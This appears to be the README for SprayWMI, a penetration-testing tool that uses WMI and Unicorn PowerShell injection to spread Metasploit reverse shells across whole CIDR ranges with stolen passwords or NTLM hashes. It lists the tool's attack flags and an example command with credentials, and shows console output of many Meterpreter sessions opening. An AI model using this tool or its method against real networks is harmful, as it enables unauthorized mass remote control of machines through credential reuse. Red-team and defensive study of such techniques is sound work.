
SprayWMI is an easy way to get mass shells on systems that support WMI. Much more effective than PSEXEC as it does not leave remnants on a system.

Primary LanguagePython

SprayWMI is a method for mass spraying Unicorn PowerShell injection to CIDR notations.

Written by: David Kennedy (@HackingDave) @TrustedSec Special thanks to: Justin Elze and Larry Spohn @TrustedSec

Initial blog post: https://www.trustedsec.com/june-2015/no_psexec_needed/ If you have trouble with this on 64-bit, try: dpkg --add-architecture i386 && apt-get update && apt-get install libpam0g:i386 && apt-get install libpopt0:i386

Flags and descriptions:

domain Domain you are attacking. If its local, just specify workgroup.

username Username to authenticate on the remote Windows system.

password Password or password hash LM:NTLM to use on the remote Windows system.

CIDR range or file Specify a single IP, CIDR range ( or multiple CIDRs:, You can also specify a file (ex: ips.txt) that contains a single IP addresses on each line. payload Metasploit payload, example: windows/meterpreter/reverse_tcp

LHOST Reverse shell IP address.

LPORT Reverse shell listening port.

optional: NO Specify no if you do not want to create a listener. This is useful if you already have a listener established. If you do not specify a value, it will automatically create a listener for you.

Usage: python spraywmi.py <optional: no>

Below is an example of output from spraywmi:

root@stronghold:/home/relik# python spraywmi.py TS kennedy-test complexP255w0rd!,,,, windows/meterpreter/reverse_tcp 443

[*] Generating shellcode through Unicorn, this could take a few seconds.

[*] Launching the listener in the background.

[*] Waiting for the listener to start first before we continue.

[*] Be patient, Metasploit takes a little bit to start.

[*] Sweeping targets for open TCP port 135 first, then moving through. Be patient.

[*] Launching WMI spray against IP: - You should have a shell in the background. Once finished, a shell will spawn.

[*] Launching WMI spray against IP: - You should have a shell in the background. Once finished, a shell will spawn.

[*] Launching WMI spray against IP: - You should have a shell in the background. Once finished, a shell will spawn.

[*] Launching WMI spray against IP: - You should have a shell in the background. Once finished, a shell will spawn.

[*] Launching WMI spray against IP: - You should have a shell in the background. Once finished, a shell will spawn.

[*] Launching WMI spray against IP: - You should have a shell in the background. Once finished, a shell will spawn.

[*] Launching WMI spray against IP: - You should have a shell in the background. Once finished, a shell will spawn.

[*] Spraying is still happening in the background, shells should arrive as they complete.

[*] Interacting with Metasploit.

msf exploit(handler) >

[*] Encoded stage with x86/shikata_ga_nai

[*] Sending encoded stage (885836 bytes) to

[*] Meterpreter session 1 opened ( -> at 2015-10-13 04:33:55 -0400

[*] Encoded stage with x86/shikata_ga_nai

[*] Sending encoded stage (885836 bytes) to

[*] Meterpreter session 2 opened ( -> at 2015-10-13 04:33:59 -0400

[*] Encoded stage with x86/shikata_ga_nai

[*] Sending encoded stage (885836 bytes) to

[*] Meterpreter session 3 opened ( -> at 2015-10-13 04:34:02 -0400

[*] Encoded stage with x86/shikata_ga_nai

[*] Sending encoded stage (885836 bytes) to

[*] Meterpreter session 4 opened ( -> at 2015-10-13 04:34:06 -0400

[*] Encoded stage with x86/shikata_ga_nai

[*] Sending encoded stage (885836 bytes) to

[*] Meterpreter session 5 opened ( -> at 2015-10-13 04:34:10 -0400

[*] Meterpreter session 13 opened ( -> at 2015-10-13 04:34:31 -0400

[*] Encoded stage with x86/shikata_ga_nai

[*] Sending encoded stage (885836 bytes) to

[*] Meterpreter session 14 opened ( -> at 2015-10-13 04:34:35 -0400

[*] Encoded stage with x86/shikata_ga_nai